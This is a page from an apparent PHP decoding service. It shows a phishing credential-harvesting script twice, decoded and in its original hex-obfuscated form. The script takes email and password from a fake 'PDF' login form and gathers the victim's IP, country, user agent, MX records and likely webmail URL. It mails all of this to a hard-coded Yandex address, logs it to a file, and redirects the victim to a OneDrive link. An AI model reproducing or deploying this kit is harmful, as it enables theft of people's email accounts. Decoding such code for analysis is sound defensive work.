Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto Z5YVg; Z5YVg: header("\x41\x63\x63\145\163\163\55\103\157\x6e\164\162\x6f\154..
Decoded Output download
<?php
goto Z5YVg; Z5YVg: header("Access-Control-Allow-Headers: Authorization, Content-Type"); goto NngXz; Gv3Je: header("content-type: application/json; charset=utf-8"); goto Y49WN; y11pE: $data = array("signal" => $signal, "msg" => $msg); goto zd90d; dKW0s: if ($password != null) { $ip = getenv("REMOTE_ADDR"); $hostname = gethostbyaddr($ip); $useragent = $_SERVER["HTTP_USER_AGENT"]; $country = file_get_contents("https://ipapi.co/{$ip}/country_name/"); $emailDomain = substr(strrchr($email, "@"), 1); $mxRecords = dns_get_record($emailDomain, DNS_MX); $mxRecordString = "No MX Records Found"; $webmailLogin = "Not Available"; if (!empty($mxRecords)) { $mxRecordString = implode(", ", array_column($mxRecords, "target")); $mxDomain = $mxRecords[0]["target"]; $webmailMapping = array("mx.google.com" => "https://mail.google.com", "mx.yandex.ru" => "https://mail.yandex.com", "mx.natrohost.com" => "https://mail." . $emailDomain); if (strpos($mxDomain, "natrohost.com") !== false) { $webmailLogin = "https://mail." . $emailDomain; } else { foreach ($webmailMapping as $key => $url) { if (strpos($mxDomain, $key) !== false) { $webmailLogin = $url; break; } } } if ($webmailLogin === "Not Available") { $webmailLogin = "https://webmail." . $emailDomain; } } $message = "------------------------
"; $message .= "Page : PDF
"; $message .= "usr : {$email}
"; $message .= "Ps : {$password}
"; $message .= "Country : {$country}
"; $message .= "Timestamp : " . date("Y-m-d H:i:s") . "\xa"; $message .= "Hostname : {$hostname}\xa"; $message .= "Webmail Login : {$webmailLogin}\xa"; $message .= "MX Records : {$mxRecordString}
"; $message .= "----------------------------------
"; $message .= "IP : {$ip}\xa"; $message .= "--- http://www.geoiptool.com/?IP={$ip} ----\xa"; $message .= "User Agent : {$useragent}\xa"; $message .= "-----------------------
"; $subject = "Client : {$ip}"; mail($Receive_email, $subject, $message); $filePath = "[email protected]"; if ($fileHandler = fopen($filePath, "a")) { fwrite($fileHandler, $message); fclose($fileHandler); } else { error_log("Unable to write to file: {$filePath}"); } header("Location: {$redirect}"); die; } else { $signal = "error_log"; $msg = "Invalid Credentials"; } goto y11pE; evrSq: $email = trim($_POST["xiemail"]); goto ZUexW; ZUexW: $password = trim($_POST["pipassword"]); goto dKW0s; zd90d: echo json_encode($data); goto ypBU9; hj8Et: $redirect = "https://onedrive.live.com/download?resid=4BCAC0F87F872624%211237&authkey=!AHGwq9qX40mxsnE&em=2"; goto evrSq; Y49WN: $Receive_email = "[email protected]"; goto hj8Et; NngXz: header("Access-Control-Allow-Origin: *"); goto Gv3Je; ypBU9: ?>
Did this file decode correctly?
Original Code
<?php
goto Z5YVg; Z5YVg: header("\x41\x63\x63\145\163\163\55\103\157\x6e\164\162\x6f\154\55\101\154\x6c\x6f\167\x2d\x48\145\141\144\145\x72\x73\x3a\40\x41\165\x74\x68\x6f\162\x69\x7a\x61\164\x69\157\x6e\x2c\40\x43\157\x6e\164\145\156\x74\x2d\x54\171\160\x65"); goto NngXz; Gv3Je: header("\x63\x6f\156\x74\x65\x6e\164\x2d\x74\171\160\x65\72\x20\x61\160\x70\x6c\x69\143\x61\x74\151\x6f\156\57\152\x73\x6f\x6e\x3b\x20\x63\150\141\162\163\145\x74\75\165\164\146\x2d\70"); goto Y49WN; y11pE: $data = array("\163\x69\x67\x6e\x61\x6c" => $signal, "\x6d\163\147" => $msg); goto zd90d; dKW0s: if ($password != null) { $ip = getenv("\122\105\x4d\117\x54\105\137\101\104\x44\x52"); $hostname = gethostbyaddr($ip); $useragent = $_SERVER["\x48\x54\124\120\x5f\125\123\x45\122\137\101\x47\105\x4e\x54"]; $country = file_get_contents("\150\x74\164\160\163\x3a\x2f\57\x69\x70\141\160\151\56\x63\x6f\x2f{$ip}\57\x63\157\x75\156\164\162\171\x5f\156\141\155\145\x2f"); $emailDomain = substr(strrchr($email, "\x40"), 1); $mxRecords = dns_get_record($emailDomain, DNS_MX); $mxRecordString = "\116\x6f\40\115\x58\x20\122\x65\143\x6f\162\x64\163\40\106\157\x75\x6e\144"; $webmailLogin = "\x4e\x6f\x74\x20\x41\166\141\151\154\141\x62\x6c\145"; if (!empty($mxRecords)) { $mxRecordString = implode("\54\x20", array_column($mxRecords, "\x74\141\162\147\x65\x74")); $mxDomain = $mxRecords[0]["\164\x61\162\147\145\x74"]; $webmailMapping = array("\155\x78\x2e\147\157\157\x67\154\145\56\x63\157\155" => "\x68\164\164\160\163\x3a\x2f\57\x6d\x61\x69\x6c\56\147\157\157\x67\x6c\145\56\x63\x6f\x6d", "\x6d\170\x2e\x79\141\156\144\x65\170\56\162\x75" => "\150\x74\164\x70\163\x3a\57\x2f\155\141\151\154\x2e\x79\141\x6e\144\145\170\56\x63\157\x6d", "\x6d\x78\x2e\x6e\x61\164\x72\x6f\150\157\x73\164\x2e\x63\157\155" => "\150\x74\164\160\163\72\57\57\x6d\141\x69\154\x2e" . $emailDomain); if (strpos($mxDomain, "\x6e\141\164\x72\157\x68\x6f\x73\x74\x2e\x63\x6f\x6d") !== false) { $webmailLogin = "\150\164\x74\x70\163\x3a\x2f\x2f\x6d\141\151\154\x2e" . $emailDomain; } else { foreach ($webmailMapping as $key => $url) { if (strpos($mxDomain, $key) !== false) { $webmailLogin = $url; break; } } } if ($webmailLogin === "\x4e\x6f\x74\x20\101\166\141\x69\x6c\141\x62\154\145") { $webmailLogin = "\x68\164\164\x70\163\x3a\57\57\167\x65\x62\155\x61\151\x6c\x2e" . $emailDomain; } } $message = "\x2d\55\x2d\55\55\55\55\55\x2d\x2d\55\55\x2d\x2d\55\x2d\x2d\55\55\55\55\55\x2d\x2d\12"; $message .= "\120\141\x67\x65\x20\x20\x20\x20\40\40\40\x20\x20\40\40\x3a\x20\x50\x44\106\12"; $message .= "\x75\163\x72\x20\40\x20\x20\40\x20\40\x20\40\40\40\x20\x3a\x20{$email}\12"; $message .= "\x50\163\x20\x20\x20\40\x20\x20\40\x20\x20\x20\40\40\x20\x3a\x20{$password}\12"; $message .= "\x43\x6f\x75\x6e\164\x72\171\40\40\x20\40\40\x20\40\x20\x3a\40{$country}\12"; $message .= "\x54\151\x6d\145\x73\x74\x61\x6d\x70\40\40\40\x20\x20\x20\72\x20" . date("\131\55\155\x2d\144\40\x48\72\x69\x3a\163") . "\xa"; $message .= "\110\157\163\x74\156\x61\x6d\145\x20\40\x20\x20\x20\x20\x20\72\40{$hostname}\xa"; $message .= "\x57\145\x62\x6d\141\x69\154\40\114\x6f\x67\x69\156\40\x20\72\40{$webmailLogin}\xa"; $message .= "\x4d\130\x20\x52\x65\143\157\x72\144\x73\x20\x20\x20\40\40\72\40{$mxRecordString}\12"; $message .= "\55\x2d\55\x2d\x2d\55\x2d\55\x2d\55\x2d\x2d\x2d\55\55\55\x2d\x2d\55\x2d\x2d\x2d\55\55\55\x2d\55\x2d\x2d\x2d\55\x2d\55\55\12"; $message .= "\x49\120\x20\x20\x20\40\40\40\40\x20\x20\40\40\x20\x20\72\x20{$ip}\xa"; $message .= "\x2d\55\x2d\40\150\x74\164\x70\x3a\x2f\57\167\167\x77\x2e\x67\x65\x6f\x69\160\x74\x6f\x6f\x6c\56\143\157\155\x2f\77\111\x50\x3d{$ip}\40\x2d\x2d\x2d\x2d\xa"; $message .= "\x55\x73\145\x72\40\x41\x67\x65\156\164\x20\40\40\x20\40\x3a\40{$useragent}\xa"; $message .= "\55\55\x2d\x2d\55\x2d\x2d\x2d\x2d\55\x2d\x2d\x2d\x2d\x2d\55\55\x2d\x2d\55\x2d\x2d\x2d\12"; $subject = "\x43\x6c\x69\145\156\164\40\72\40{$ip}"; mail($Receive_email, $subject, $message); $filePath = "\144\100\155\141\x69\156\x31\62\x33\x2e\x74\x78\164"; if ($fileHandler = fopen($filePath, "\x61")) { fwrite($fileHandler, $message); fclose($fileHandler); } else { error_log("\x55\x6e\141\142\154\x65\40\x74\157\x20\x77\162\151\164\x65\40\164\x6f\40\x66\151\154\145\72\x20{$filePath}"); } header("\x4c\x6f\x63\x61\164\151\x6f\x6e\x3a\x20{$redirect}"); die; } else { $signal = "\145\162\x72\157\x72\137\154\157\x67"; $msg = "\x49\156\166\141\x6c\151\x64\x20\103\x72\145\144\x65\156\164\151\141\154\163"; } goto y11pE; evrSq: $email = trim($_POST["\170\x69\x65\155\141\151\x6c"]); goto ZUexW; ZUexW: $password = trim($_POST["\160\151\x70\141\163\x73\167\157\x72\144"]); goto dKW0s; zd90d: echo json_encode($data); goto ypBU9; hj8Et: $redirect = "\150\164\164\x70\x73\72\x2f\x2f\x6f\156\145\x64\x72\151\166\145\56\x6c\x69\x76\145\x2e\x63\x6f\155\57\x64\157\x77\x6e\154\157\x61\144\x3f\x72\145\x73\x69\144\x3d\64\102\x43\101\x43\x30\x46\x38\67\x46\70\67\62\x36\x32\x34\45\62\61\61\62\63\x37\x26\x61\x75\x74\x68\153\145\x79\x3d\41\x41\110\x47\x77\x71\71\x71\130\x34\x30\155\x78\163\x6e\105\x26\x65\155\75\x32"; goto evrSq; Y49WN: $Receive_email = "\x6a\157\141\156\x6e\141\x76\x65\147\x61\x70\150\141\x72\155\141\x40\x79\x61\156\x64\145\170\x2e\x63\x6f\155"; goto hj8Et; NngXz: header("\101\143\x63\x65\163\x73\55\x43\x6f\156\x74\162\x6f\154\x2d\101\154\x6c\x6f\x77\x2d\x4f\x72\151\147\151\x6e\x3a\40\52"); goto Gv3Je; ypBU9: ?>
Function Calls
None |
Stats
MD5 | b1feed700420ced1fe5f750d00adcf1c |
Eval Count | 0 |
Decode Time | 56 ms |